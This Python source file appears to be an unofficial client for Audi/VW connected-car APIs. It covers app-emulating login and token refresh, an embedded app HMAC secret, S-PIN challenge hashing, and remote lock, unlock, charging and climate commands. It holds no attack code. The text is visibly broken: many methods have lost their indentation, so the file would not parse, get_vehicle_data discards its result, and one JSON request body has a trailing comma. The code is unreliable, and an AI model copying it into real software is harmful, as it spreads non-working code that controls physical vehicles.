    async def get_stored_position(self, vin: str):
        """Return the last known vehicle position JSON."""
        self._api.use_token(self.vwToken)
        return await self._api.get(
            "{homeRegion}/fs-car/bs/cf/v1/{type}/{country}/vehicles/{vin}/position".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            )
        )
    async def get_operations_list(self, vin: str):
        """Return the roles/rights operation list for *vin* (which remote
        services the account may invoke)."""
        self._api.use_token(self.vwToken)
        return await self._api.get(
            "https://mal-1a.prd.ece.vwg-connect.com/api/rolesrights/operationlist/v3/vehicles/"
            + vin.upper()
        )
    async def get_timer(self, vin: str):
        """Return the departure-timer configuration JSON."""
        self._api.use_token(self.vwToken)
        return await self._api.get(
            "{homeRegion}/fs-car/bs/departuretimer/v1/{type}/{country}/vehicles/{vin}/timer".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            )
        )
    async def get_vehicles(self):
        """Return the raw list of vehicles attached to the account."""
        self._api.use_token(self.vwToken)
        return await self._api.get(
            "https://msg.volkswagen.de/fs-car/usermanagement/users/v1/{type}/{country}/vehicles".format(
                type=self._type, country=self._country
            )
        )
    async def get_vehicle_information(self):
        """Query the myAudi GraphQL endpoint for the user's vehicle list and
        return it parsed into a VehiclesResponse.

        Uses the AZS token (self.audiToken) rather than the MBB token; raises
        when the response contains no "data" key.
        """
        headers = {
            "Accept": "application/json",
            "Accept-Charset": "utf-8",
            "X-App-Name": "myAudi",
            "X-App-Version": AudiAPI.HDR_XAPP_VERSION,
            "Accept-Language": "{l}-{c}".format(
                l=self._language, c=self._country.upper()
            ),
            "X-User-Country": self._country.upper(),
            "User-Agent": AudiAPI.HDR_USER_AGENT,
            "Authorization": "Bearer " + self.audiToken["access_token"],
            "Content-Type": "application/json; charset=utf-8",
        }
        req_data = {
            "query": "query vehicleList {\n userVehicles {\n vin\n mappingVin\n vehicle { core { modelYear\n }\n media { shortName\n longName }\n }\n csid\n commissionNumber\n type\n devicePlatform\n mbbConnect\n userRole {\n role\n }\n vehicle {\n classification {\n driveTrain\n }\n }\n nickname\n }\n}"
        }
        req_rsp, rep_rsptxt = await self._api.request(
            "POST",
            "https://app-api.live-my.audi.com/vgql/v1/graphql",
            json.dumps(req_data),
            headers=headers,
            allow_redirects=False,
            rsp_wtxt=True,
        )
        vins = json.loads(rep_rsptxt)
        if "data" not in vins:
            raise Exception("Invalid json in get_vehicle_information")
        response = VehiclesResponse()
        response.parse(vins["data"])
        return response
async def get_vehicle_data(self, vin: str):
self._api.use_token(self.vwToken)
data = await self._api.get(
"{homeRegion}/fs-car/vehicleMgmt/vehicledata/v2/{type}/{country}/vehicles/{vin}/".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
)
)
    async def get_tripdata(self, vin: str, kind: str):
        """Fetch trip statistics of the given *kind* (e.g. shortTerm/longTerm)
        and return (current_trip, last_reset_trip) as TripDataResponse objects.

        The list is sorted by overallMileage descending; entries whose start
        mileage is within 2 km of the newest trip are merged into it, and the
        first older entry is treated as the trip before the last reset.
        """
        self._api.use_token(self.vwToken)
        # read tripdata
        headers = {
            "Accept": "application/json",
            "Accept-Charset": "utf-8",
            "X-App-Name": "myAudi",
            "X-App-Version": AudiAPI.HDR_XAPP_VERSION,
            "X-Client-ID": self.xclientId,
            "User-Agent": AudiAPI.HDR_USER_AGENT,
            "Authorization": "Bearer " + self.vwToken["access_token"],
        }
        # NOTE(review): naive UTC timestamps; the +90 min pad presumably
        # covers clock skew between client and server — confirm.
        td_reqdata = {
            "type": "list",
            "from": "1970-01-01T00:00:00Z",
            # "from":(datetime.utcnow() - timedelta(days=365)).strftime("%Y-%m-%dT%H:%M:%SZ"),
            "to": (datetime.utcnow() + timedelta(minutes=90)).strftime("%Y-%m-%dT%H:%M:%SZ"),
        }
        data = await self._api.request(
            "GET",
            "{homeRegion}/api/bs/tripstatistics/v1/vehicles/{vin}/tripdata/{kind}".format(
                homeRegion=await self._get_home_region_setter(vin.upper()),
                vin=vin.upper(),
                kind=kind,
            ),
            None,
            params=td_reqdata,
            headers=headers,
        )
        td_sorted = sorted(
            data["tripDataList"]["tripData"],
            key=lambda k: k["overallMileage"],
            reverse=True,
        )
        td_current = td_sorted[0]
        td_reset_trip = None
        for trip in td_sorted:
            if (td_current["startMileage"] - trip["startMileage"]) > 2:
                td_reset_trip = trip
                break
            else:
                td_current["tripID"] = trip["tripID"]
                td_current["startMileage"] = trip["startMileage"]
        return TripDataResponse(td_current), TripDataResponse(td_reset_trip)
async def _fill_home_region(self, vin: str):
self._homeRegion[vin] = "https://msg.volkswagen.de"
self._homeRegionSetter[vin] = "https://mal-1a.prd.ece.vwg-connect.com"
try:
self._api.use_token(self.vwToken)
res = await self._api.get("https://mal-1a.prd.ece.vwg-connect.com/api/cs/vds/v1/vehicles/{vin}/homeRegion".format(vin=vin))
if res != None and res.get("homeRegion") != None and res["homeRegion"].get("baseUri") != None and res["homeRegion"]["baseUri"].get("content") != None:
uri = res["homeRegion"]["baseUri"]["content"]
if uri != "https://mal-1a.prd.ece.vwg-connect.com/api":
self._homeRegionSetter[vin] = uri.split("/api")[0]
self._homeRegion[vin] = self._homeRegionSetter[vin].replace("mal-", "fal-")
except Exception:
pass
async def _get_home_region(self, vin: str):
if self._homeRegion.get(vin) != None:
return self._homeRegion[vin]
await self._fill_home_region(vin)
return self._homeRegion[vin]
async def _get_home_region_setter(self, vin: str):
if self._homeRegionSetter.get(vin) != None:
return self._homeRegionSetter[vin]
await self._fill_home_region(vin)
return self._homeRegionSetter[vin]
    async def _get_security_token(self, vin: str, action: str):
        """Perform the two-step S-PIN challenge/response for a privileged
        *action* (e.g. lock/unlock) and return the resulting security token."""
        # Challenge
        headers = {
            "User-Agent": "okhttp/3.7.0",
            "X-App-Version": "3.14.0",
            "X-App-Name": "myAudi",
            "Accept": "application/json",
            "Authorization": "Bearer " + self.vwToken.get("access_token"),
        }
        body = await self._api.request(
            "GET",
            "{homeRegionSetter}/api/rolesrights/authorization/v2/vehicles/".format(homeRegionSetter=await self._get_home_region_setter(vin.upper()))
            + vin.upper()
            + "/services/"
            + action
            + "/security-pin-auth-requested",
            headers=headers,
            data=None,
        )
        secToken = body["securityPinAuthInfo"]["securityToken"]
        challenge = body["securityPinAuthInfo"]["securityPinTransmission"]["challenge"]
        # Response: answer the challenge with a hash derived from the S-PIN.
        securityPinHash = self._generate_security_pin_hash(challenge)
        data = {
            "securityPinAuthentication": {
                "securityPin": {
                    "challenge": challenge,
                    "securityPinHash": securityPinHash,
                },
                "securityToken": secToken,
            }
        }
        headers = {
            "User-Agent": "okhttp/3.7.0",
            "Content-Type": "application/json",
            "X-App-Version": "3.14.0",
            "X-App-Name": "myAudi",
            "Accept": "application/json",
            "Authorization": "Bearer " + self.vwToken.get("access_token"),
        }
        body = await self._api.request(
            "POST",
            "{homeRegionSetter}/api/rolesrights/authorization/v2/security-pin-auth-completed".format(homeRegionSetter=await self._get_home_region_setter(vin.upper())),
            headers=headers,
            data=json.dumps(data),
        )
        return body["securityToken"]
def _get_vehicle_action_header(self, content_type: str, security_token: str):
headers = {
"User-Agent": "okhttp/3.7.0",
"Host": "msg.volkswagen.de",
"X-App-Version": "3.14.0",
"X-App-Name": "myAudi",
"Authorization": "Bearer " + self.vwToken.get("access_token"),
"Accept-charset": "UTF-8",
"Content-Type": content_type,
"Accept": "application/json, application/vnd.vwg.mbb.ChargerAction_v1_0_0+xml,application/vnd.volkswagenag.com-error-v1+xml,application/vnd.vwg.mbb.genericError_v1_0_2+xml, application/vnd.vwg.mbb.RemoteStandheizung_v2_0_0+xml, application/vnd.vwg.mbb.genericError_v1_0_2+xml,application/vnd.vwg.mbb.RemoteLockUnlock_v1_0_0+xml,*/*",
}
if security_token != None:
headers["x-mbbSecToken"] = security_token
return headers
    async def set_vehicle_lock(self, vin: str, lock: bool):
        """Lock (lock=True) or unlock the vehicle, then poll until the
        request completes (raises on failure or timeout). Requires an S-PIN
        security token."""
        security_token = await self._get_security_token(
            vin, "rlu_v1/operations/" + ("LOCK" if lock else "UNLOCK")
        )
        data = '<?xml version="1.0" encoding= "UTF-8" ?><rluAction xmlns="http://audi.de/connect/rlu"><action>{action}</action></rluAction>'.format(
            action="lock" if lock else "unlock"
        )
        headers = self._get_vehicle_action_header(
            "application/vnd.vwg.mbb.RemoteLockUnlock_v1_0_0+xml", security_token
        )
        res = await self._api.request(
            "POST",
            "{homeRegion}/fs-car/bs/rlu/v1/{type}/{country}/vehicles/{vin}/actions".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            ),
            headers=headers,
            data=data,
        )
        checkUrl = "{homeRegion}/fs-car/bs/rlu/v1/{type}/{country}/vehicles/{vin}/requests/{requestId}/status".format(
            homeRegion=await self._get_home_region(vin.upper()),
            type=self._type,
            country=self._country,
            vin=vin.upper(),
            requestId=res["rluActionResponse"]["requestId"],
        )
        await self.check_request_succeeded(
            checkUrl,
            "lock vehicle" if lock else "unlock vehicle",
            REQUEST_SUCCESSFUL,
            REQUEST_FAILED,
            "requestStatusResponse.status",
        )
    async def set_battery_charger(self, vin: str, start: bool, timer: bool):
        """Start (timer-based or immediate) or stop battery charging, then
        poll the action status until it completes."""
        if start and timer:
            data = '{ "action": { "type": "selectChargingMode", "settings": { "chargeModeSelection": { "value": "timerBasedCharging" } } }}'
        elif start:
            data = '{ "action": { "type": "selectChargingMode", "settings": { "chargeModeSelection": { "value": "immediateCharging" } } }}'
        else:
            data = '{ "action": { "type": "stop" }}'
        headers = self._get_vehicle_action_header(
            "application/json", None
        )
        res = await self._api.request(
            "POST",
            "{homeRegion}/fs-car/bs/batterycharge/v1/{type}/{country}/vehicles/{vin}/charger/actions".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            ),
            headers=headers,
            data=data,
        )
        checkUrl = "{homeRegion}/fs-car/bs/batterycharge/v1/{type}/{country}/vehicles/{vin}/charger/actions/{actionid}".format(
            homeRegion=await self._get_home_region(vin.upper()),
            type=self._type,
            country=self._country,
            vin=vin.upper(),
            actionid=res["action"]["actionId"],
        )
        await self.check_request_succeeded(
            checkUrl,
            "start charger" if start else "stop charger",
            SUCCEEDED,
            FAILED,
            "action.actionState",
        )
async def set_climatisation(self, vin: str, start: bool):
if start:
data = '{"action":{"type": "startClimatisation","settings": {"targetTemperature": 2940,"climatisationWithoutHVpower": true,"heaterSource": "electric","climaterElementSettings": {"isClimatisationAtUnlock": false, "isMirrorHeatingEnabled": true,}}}}'
else:
data = '{"action":{"type": "stopClimatisation"}}'
headers = self._get_vehicle_action_header(
'application/json', None
)
res = await self._api.request(
"POST",
"{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type, country=self._country, vin=vin.upper()
),
headers=headers,
data=data,
)
checkUrl = "{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions/{actionid}".format(
homeRegion=await self._get_home_region(vin.upper()),
type=self._type,
country=self._country,
vin=vin.upper(),
actionid=res["action"]["actionId"],
)
await self.check_request_succeeded(
checkUrl,
"start climatisation" if start else "stop climatisation",
SUCCEEDED,
FAILED,
"action.actionState",
)
    async def set_window_heating(self, vin: str, start: bool):
        """Start or stop window heating and poll the action until it
        completes."""
        data = '<?xml version="1.0" encoding= "UTF-8" ?><action><type>{action}</type></action>'.format(
            action="startWindowHeating" if start else "stopWindowHeating"
        )
        headers = self._get_vehicle_action_header(
            "application/vnd.vwg.mbb.ClimaterAction_v1_0_0+xml", None
        )
        res = await self._api.request(
            "POST",
            "{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            ),
            headers=headers,
            data=data,
        )
        checkUrl = "{homeRegion}/fs-car/bs/climatisation/v1/{type}/{country}/vehicles/{vin}/climater/actions/{actionid}".format(
            homeRegion=await self._get_home_region(vin.upper()),
            type=self._type,
            country=self._country,
            vin=vin.upper(),
            actionid=res["action"]["actionId"],
        )
        await self.check_request_succeeded(
            checkUrl,
            "start window heating" if start else "stop window heating",
            SUCCEEDED,
            FAILED,
            "action.actionState",
        )
    async def set_pre_heater(self, vin: str, activate: bool):
        """Quick-start or quick-stop the auxiliary pre-heater. Requires an
        S-PIN security token; fire-and-forget (no status polling)."""
        security_token = await self._get_security_token(
            vin, "rheating_v1/operations/P_QSACT"
        )
        data = '<?xml version="1.0" encoding= "UTF-8" ?>{input}'.format(
            input='<performAction xmlns="http://audi.de/connect/rs"><quickstart><active>true</active></quickstart></performAction>'
            if activate
            else '<performAction xmlns="http://audi.de/connect/rs"><quickstop><active>false</active></quickstop></performAction>'
        )
        headers = self._get_vehicle_action_header(
            "application/vnd.vwg.mbb.RemoteStandheizung_v2_0_0+xml", security_token
        )
        await self._api.request(
            "POST",
            "{homeRegion}/fs-car/bs/rs/v1/{type}/{country}/vehicles/{vin}/action".format(
                homeRegion=await self._get_home_region(vin.upper()),
                type=self._type, country=self._country, vin=vin.upper()
            ),
            headers=headers,
            data=data,
        )
    async def check_request_succeeded(
        self, url: str, action: str, successCode: str, failedCode: str, path: str
    ):
        """Poll *url* until the status at dotted *path* equals successCode.

        Sleeps REQUEST_STATUS_SLEEP seconds between polls, up to
        MAX_RESPONSE_ATTEMPTS attempts. Raises when the status is missing,
        equals failedCode, or the attempts are exhausted (timeout).
        """
        for _ in range(MAX_RESPONSE_ATTEMPTS):
            await asyncio.sleep(REQUEST_STATUS_SLEEP)
            self._api.use_token(self.vwToken)
            res = await self._api.get(url)
            status = get_attr(res, path)
            if status is None or (failedCode is not None and status == failedCode):
                raise Exception(
                    "Cannot {action}, return code '{code}'".format(
                        action=action, code=status
                    )
                )
            if status == successCode:
                return
        raise Exception("Cannot {action}, operation timed out".format(action=action))
# TR/2022-02-17: New secrect for X_QMAuth
def _calculate_X_QMAuth(self):
# Calcualte X-QMAuth value
gmtime_100sec = int(
(datetime.utcnow() - datetime(1970, 1, 1)).total_seconds() / 100
)
xqmauth_secret = bytes([55,24,256-56,256-96,256-72,256-110,57,256-87,3,256-86,256-41,256-103,33,256-30,99,103,81,125,256-39,256-39,71,18,256-107,256-112,256-120,256-12,256-104,89,103,113,256-128,256-91])
xqmauth_val = hmac.new(
xqmauth_secret,
str(gmtime_100sec).encode("ascii", "ignore"),
digestmod="sha256",
).hexdigest()
return "v1:55f755b0:" + xqmauth_val
# TR/2021-12-01: Refresh token before it expires
# returns True when refresh was required and succesful, otherwise False
    async def refresh_token_if_necessary(self, elapsed_sec: int) -> bool:
        """Refresh the whole token chain when the MBB token is near expiry.

        elapsed_sec: seconds since the current token set was obtained.
        Returns True only when a refresh was required and every step
        (MBB/vw token, IDK bearer token, AZS audi token) succeeded;
        False when no refresh is needed yet or any step fails (errors are
        logged, never raised).
        """
        if self.mbboauthToken is None:
            return False
        if "refresh_token" not in self.mbboauthToken:
            return False
        if "expires_in" not in self.mbboauthToken:
            return False
        if (elapsed_sec + 5 * 60) < self.mbboauthToken["expires_in"]:
            # refresh not needed now (keep a 5-minute safety margin)
            return False
        try:
            headers = {
                "Accept": "application/json",
                "Accept-Charset": "utf-8",
                "User-Agent": AudiAPI.HDR_USER_AGENT,
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Client-ID": self.xclientId,
            }
            mbboauth_refresh_data = {
                "grant_type": "refresh_token",
                "token": self.mbboauthToken["refresh_token"],
                "scope": "sc2:fal",
                # "vin": vin, << App uses a dedicated VIN here, but it works without, don't know
            }
            encoded_mbboauth_refresh_data = urlencode(mbboauth_refresh_data, encoding="utf-8").replace("+", "%20")
            mbboauth_refresh_rsp, mbboauth_refresh_rsptxt = await self._api.request(
                "POST",
                self.mbbOAuthBaseURL + "/mobile/oauth2/v1/token",
                encoded_mbboauth_refresh_data,
                headers=headers,
                allow_redirects=False,
                rsp_wtxt=True,
            )
            # this code is the old "vwToken"
            self.vwToken = json.loads(mbboauth_refresh_rsptxt)
            # TR/2022-02-10: If a new refresh_token is provided, save it for further refreshes
            if "refresh_token" in self.vwToken:
                self.mbboauthToken["refresh_token"] = self.vwToken["refresh_token"]
            # hdr
            headers = {
                "Accept": "application/json",
                "Accept-Charset": "utf-8",
                "X-QMAuth": self._calculate_X_QMAuth(),
                "User-Agent": AudiAPI.HDR_USER_AGENT,
                "Content-Type": "application/x-www-form-urlencoded",
            }
            # IDK token request data
            tokenreq_data = {
                "client_id": self._client_id,
                "grant_type": "refresh_token",
                "refresh_token": self._bearer_token_json.get("refresh_token"),
                "response_type": "token id_token",
            }
            # IDK token request
            encoded_tokenreq_data = urlencode(tokenreq_data, encoding="utf-8").replace("+","%20")
            bearer_token_rsp, bearer_token_rsptxt = await self._api.request(
                "POST",
                self._tokenEndpoint,
                encoded_tokenreq_data,
                headers=headers,
                allow_redirects=False,
                rsp_wtxt=True,
            )
            self._bearer_token_json = json.loads(bearer_token_rsptxt)
            # AZS token: exchange the IDK access token for an Audi token
            headers = {
                "Accept": "application/json",
                "Accept-Charset": "utf-8",
                "X-App-Version": AudiAPI.HDR_XAPP_VERSION,
                "X-App-Name": "myAudi",
                "User-Agent": AudiAPI.HDR_USER_AGENT,
                "Content-Type": "application/json; charset=utf-8",
            }
            asz_req_data = {
                "token": self._bearer_token_json["access_token"],
                "grant_type": "id_token",
                "stage": "live",
                "config": "myaudi",
            }
            azs_token_rsp, azs_token_rsptxt = await self._api.request(
                "POST",
                self._authorizationServerBaseURLLive + "/token",
                json.dumps(asz_req_data),
                headers=headers,
                allow_redirects=False,
                rsp_wtxt=True,
            )
            azs_token_json = json.loads(azs_token_rsptxt)
            self.audiToken = azs_token_json
            return True
        except Exception as exception:
            # Swallow and report: callers treat False as "keep old tokens".
            _LOGGER.error("Refresh token failed: " + str(exception))
            return False
# TR/2021-12-01 updated to match behaviour of Android myAudi 4.5.0
async def login_request(self, user: str, password: str):
    """Perform the complete myAudi login flow and store the session tokens.

    Mirrors the Android myAudi app sequence:
      1. Fetch the markets list and the market/OpenID configuration.
      2. Run the OIDC authorization-code flow with PKCE (email form,
         then password form, then two redirects to collect the code).
      3. Exchange the authorization code for IDK bearer tokens.
      4. Exchange the bearer token for the AZS token (``self.audiToken``).
      5. Register an mbboauth client, obtain and immediately refresh the
         MBB OAuth token (``self.mbboauthToken`` / ``self.vwToken``).

    Args:
        user: account e-mail address.
        password: account password.

    Raises:
        Exception: if the configured country is not a known market.
    """
    self._api.use_token(None)
    self._api.set_xclient_id(None)
    self.xclientId = None
    # get markets
    markets_json = await self._api.request(
        "GET",
        "https://content.app.my.audi.com/service/mobileapp/configurations/markets",
        None,
    )
    if (
        self._country.upper()
        not in markets_json["countries"]["countrySpecifications"]
    ):
        raise Exception("Country not found")
    self._language = markets_json["countries"]["countrySpecifications"][
        self._country.upper()
    ]["defaultLanguage"]
    # Dynamic configuration URLs
    marketcfg_url = "https://content.app.my.audi.com/service/mobileapp/configurations/market/{c}/{l}?v=4.6.0".format(
        c=self._country, l=self._language
    )
    openidcfg_url = "https://idkproxy-service.apps.{0}.vwapps.io/v1/{0}/openid-configuration".format(
        "na" if self._country.upper() == "US" else "emea")
    # get market config
    marketcfg_json = await self._api.request("GET", marketcfg_url, None)
    # use dynamic config from marketcfg, falling back to known-good defaults
    self._client_id = "09b6cbec-cd19-4589-82fd-363dfa8c24da@apps_vw-dilab_com"
    if "idkClientIDAndroidLive" in marketcfg_json:
        self._client_id = marketcfg_json["idkClientIDAndroidLive"]
    self._authorizationServerBaseURLLive = "https://aazsproxy-service.apps.emea.vwapps.io"
    if "authorizationServerBaseURLLive" in marketcfg_json:
        self._authorizationServerBaseURLLive = marketcfg_json[
            "authorizationServerBaseURLLive"
        ]
    self.mbbOAuthBaseURL = "https://mbboauth-1d.prd.ece.vwg-connect.com/mbbcoauth"
    if "mbbOAuthBaseURLLive" in marketcfg_json:
        self.mbbOAuthBaseURL = marketcfg_json["mbbOAuthBaseURLLive"]
    # get openId config
    openidcfg_json = await self._api.request("GET", openidcfg_url, None)
    # use dynamic config from openId config
    authorization_endpoint = "https://identity.vwgroup.io/oidc/v1/authorize"
    if "authorization_endpoint" in openidcfg_json:
        authorization_endpoint = openidcfg_json["authorization_endpoint"]
    self._tokenEndpoint = "https://idkproxy-service.apps.emea.vwapps.io/v1/emea/token"
    if "token_endpoint" in openidcfg_json:
        self._tokenEndpoint = openidcfg_json["token_endpoint"]
    revocation_endpoint = (
        "https://idkproxy-service.apps.emea.vwapps.io/v1/emea/revoke"
    )
    # BUG FIX: the original tested `if revocation_endpoint in openidcfg_json`,
    # i.e. used the default URL string as the lookup key, which is always
    # False, so the server-provided revocation endpoint was never picked up.
    if "revocation_endpoint" in openidcfg_json:
        revocation_endpoint = openidcfg_json["revocation_endpoint"]
    # generate code_challenge (PKCE, RFC 7636 "S256" method)
    code_verifier = str(base64.urlsafe_b64encode(os.urandom(32)), "utf-8").strip(
        "="
    )
    code_challenge = str(
        base64.urlsafe_b64encode(
            sha256(code_verifier.encode("ascii", "ignore")).digest()
        ),
        "utf-8",
    ).strip("=")
    code_challenge_method = "S256"
    # CSRF/replay protection values for the OIDC request
    state = str(uuid.uuid4())
    nonce = str(uuid.uuid4())
    # login page
    headers = {
        "Accept": "application/json",
        "Accept-Charset": "utf-8",
        "X-App-Version": AudiAPI.HDR_XAPP_VERSION,
        "X-App-Name": "myAudi",
        "User-Agent": AudiAPI.HDR_USER_AGENT,
    }
    idk_data = {
        "response_type": "code",
        "client_id": self._client_id,
        "redirect_uri": "myaudi:///",
        "scope": "address profile badge birthdate birthplace nationalIdentifier nationality profession email vin phone nickname name picture mbb gallery openid",
        "state": state,
        "nonce": nonce,
        "prompt": "login",
        "code_challenge": code_challenge,
        "code_challenge_method": code_challenge_method,
        "ui_locales": "de-de de",
    }
    idk_rsp, idk_rsptxt = await self._api.request(
        "GET",
        authorization_endpoint,
        None,
        headers=headers,
        params=idk_data,
        rsp_wtxt=True,
    )
    # form_data with email
    submit_data = self.get_hidden_html_input_form_data(idk_rsptxt, {"email": user})
    submit_url = self.get_post_url(idk_rsptxt, authorization_endpoint)
    # send email
    email_rsp, email_rsptxt = await self._api.request(
        "POST",
        submit_url,
        submit_data,
        headers=headers,
        cookies=idk_rsp.cookies,
        allow_redirects=True,
        rsp_wtxt=True,
    )
    # form_data with password
    # 2022-01-29: new HTML response uses a js two build the html form data + button.
    # Therefore it's not possible to extract hmac and other form data.
    # --> extract hmac from embedded js snippet.
    # (raw string: the original non-raw '\s' escapes trigger a
    # DeprecationWarning on modern Python; the pattern is unchanged)
    regex_res = re.findall(r'"hmac"\s*:\s*"[0-9a-fA-F]+"', email_rsptxt)
    if regex_res:
        submit_url = submit_url.replace("identifier", "authenticate")
        submit_data["hmac"] = regex_res[0].split(":")[1].strip('"')
        submit_data["password"] = password
    else:
        submit_data = self.get_hidden_html_input_form_data(email_rsptxt, {"password": password})
        submit_url = self.get_post_url(email_rsptxt, submit_url)
    # send password
    pw_rsp, pw_rsptxt = await self._api.request(
        "POST",
        submit_url,
        submit_data,
        headers=headers,
        cookies=idk_rsp.cookies,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    # forward1 after pwd
    fwd1_rsp, fwd1_rsptxt = await self._api.request(
        "GET",
        pw_rsp.headers["Location"],
        None,
        headers=headers,
        cookies=idk_rsp.cookies,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    # forward2 after pwd
    fwd2_rsp, fwd2_rsptxt = await self._api.request(
        "GET",
        fwd1_rsp.headers["Location"],
        None,
        headers=headers,
        cookies=idk_rsp.cookies,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    # get tokens: the final redirect carries the authorization code in the
    # "myaudi:///?..." Location header
    codeauth_rsp, codeauth_rsptxt = await self._api.request(
        "GET",
        fwd2_rsp.headers["Location"],
        None,
        headers=headers,
        cookies=fwd2_rsp.cookies,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    authcode_parsed = urlparse(
        codeauth_rsp.headers["Location"][len("myaudi:///?") :]
    )
    authcode_strings = parse_qs(authcode_parsed.path)
    # hdr
    headers = {
        "Accept": "application/json",
        "Accept-Charset": "utf-8",
        "X-QMAuth": self._calculate_X_QMAuth(),
        "User-Agent": AudiAPI.HDR_USER_AGENT,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    # IDK token request data
    tokenreq_data = {
        "client_id": self._client_id,
        "grant_type": "authorization_code",
        "code": authcode_strings["code"][0],
        "redirect_uri": "myaudi:///",
        "response_type": "token id_token",
        "code_verifier": code_verifier,
    }
    # IDK token request ("+" must be sent as "%20" for this endpoint)
    encoded_tokenreq_data = urlencode(tokenreq_data, encoding="utf-8").replace("+", "%20")
    bearer_token_rsp, bearer_token_rsptxt = await self._api.request(
        "POST",
        self._tokenEndpoint,
        encoded_tokenreq_data,
        headers=headers,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    self._bearer_token_json = json.loads(bearer_token_rsptxt)
    # AZS token
    headers = {
        "Accept": "application/json",
        "Accept-Charset": "utf-8",
        "X-App-Version": AudiAPI.HDR_XAPP_VERSION,
        "X-App-Name": "myAudi",
        "User-Agent": AudiAPI.HDR_USER_AGENT,
        "Content-Type": "application/json; charset=utf-8",
    }
    asz_req_data = {
        "token": self._bearer_token_json["access_token"],
        "grant_type": "id_token",
        "stage": "live",
        "config": "myaudi",
    }
    azs_token_rsp, azs_token_rsptxt = await self._api.request(
        "POST",
        self._authorizationServerBaseURLLive + "/token",
        json.dumps(asz_req_data),
        headers=headers,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    azs_token_json = json.loads(azs_token_rsptxt)
    self.audiToken = azs_token_json
    # mbboauth client register
    headers = {
        "Accept": "application/json",
        "Accept-Charset": "utf-8",
        "User-Agent": AudiAPI.HDR_USER_AGENT,
        "Content-Type": "application/json; charset=utf-8",
    }
    mbboauth_reg_data = {
        "client_name": "SM-A405FN",
        "platform": "google",
        "client_brand": "Audi",
        "appName": "myAudi",
        "appVersion": AudiAPI.HDR_XAPP_VERSION,
        "appId": "de.myaudi.mobile.assistant",
    }
    mbboauth_client_reg_rsp, mbboauth_client_reg_rsptxt = await self._api.request(
        "POST",
        self.mbbOAuthBaseURL + "/mobile/register/v1",
        json.dumps(mbboauth_reg_data),
        headers=headers,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    mbboauth_client_reg_json = json.loads(mbboauth_client_reg_rsptxt)
    self.xclientId = mbboauth_client_reg_json["client_id"]
    self._api.set_xclient_id(self.xclientId)
    # mbboauth auth
    headers = {
        "Accept": "application/json",
        "Accept-Charset": "utf-8",
        "User-Agent": AudiAPI.HDR_USER_AGENT,
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Client-ID": self.xclientId,
    }
    mbboauth_auth_data = {
        "grant_type": "id_token",
        "token": self._bearer_token_json["id_token"],
        "scope": "sc2:fal",
    }
    encoded_mbboauth_auth_data = urlencode(mbboauth_auth_data, encoding="utf-8").replace("+", "%20")
    mbboauth_auth_rsp, mbboauth_auth_rsptxt = await self._api.request(
        "POST",
        self.mbbOAuthBaseURL + "/mobile/oauth2/v1/token",
        encoded_mbboauth_auth_data,
        headers=headers,
        allow_redirects=False,
        rsp_wtxt=True,
    )
    mbboauth_auth_json = json.loads(mbboauth_auth_rsptxt)
    # store token and expiration time
    self.mbboauthToken = mbboauth_auth_json
    # mbboauth refresh (app immediately refreshes the token)
    headers = {
        "Accept": "application/json",
        "Accept-Charset": "utf-8",
        "User-Agent": AudiAPI.HDR_USER_AGENT,
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Client-ID": self.xclientId,
    }
    mbboauth_refresh_data = {
        "grant_type": "refresh_token",
        "token": mbboauth_auth_json["refresh_token"],
        "scope": "sc2:fal",
        # "vin": vin, << App uses a dedicated VIN here, but it works without, don't know
    }
    encoded_mbboauth_refresh_data = urlencode(mbboauth_refresh_data, encoding="utf-8").replace("+", "%20")
    mbboauth_refresh_rsp, mbboauth_refresh_rsptxt = await self._api.request(
        "POST",
        self.mbbOAuthBaseURL + "/mobile/oauth2/v1/token",
        encoded_mbboauth_refresh_data,
        headers=headers,
        allow_redirects=False,
        cookies=mbboauth_client_reg_rsp.cookies,
        rsp_wtxt=True,
    )
    # this code is the old "vwToken"
    self.vwToken = json.loads(mbboauth_refresh_rsptxt)
def _generate_security_pin_hash(self, challenge):
    """Return the uppercase SHA-512 hex digest of S-PIN bytes + challenge bytes."""
    combined = bytes(to_byte_array(self._spin) + to_byte_array(challenge))
    return sha512(combined).hexdigest().upper()
async def _emulate_browser(
    self, reply: BrowserLoginResponse, form_data: Dict[str, str]
) -> BrowserLoginResponse:
    """Follow the login redirect, merge the page's hidden form fields into
    *form_data*, and POST the form.

    Returns the (non-redirected) response wrapped with the POST url.
    Raises RequestException when the form action cannot be resolved.
    """
    # The reply redirects to the login page; fetch it raw for parsing.
    login_location = reply.get_location()
    page_reply = await self._api.get(login_location, raw_contents=True)

    # Pull the target form and its hidden inputs (csrf token and friends).
    html = BeautifulSoup(page_reply, "html.parser")
    form_tag = html.find("form")
    for hidden_input in html.find_all("input", attrs={"type": "hidden"}):
        form_data[hidden_input.get("name")] = hidden_input.get("value")

    # Resolve the form's action attribute to an absolute URL.
    action = form_tag.get("action")
    if action.startswith("http"):
        username_post_url = action
    elif action.startswith("/"):
        username_post_url = BrowserLoginResponse.to_absolute(login_location, action)
    else:
        raise RequestException("Unknown form action: " + action)

    reply = await self._api.post(
        username_post_url,
        form_data,
        headers={"referer": login_location},
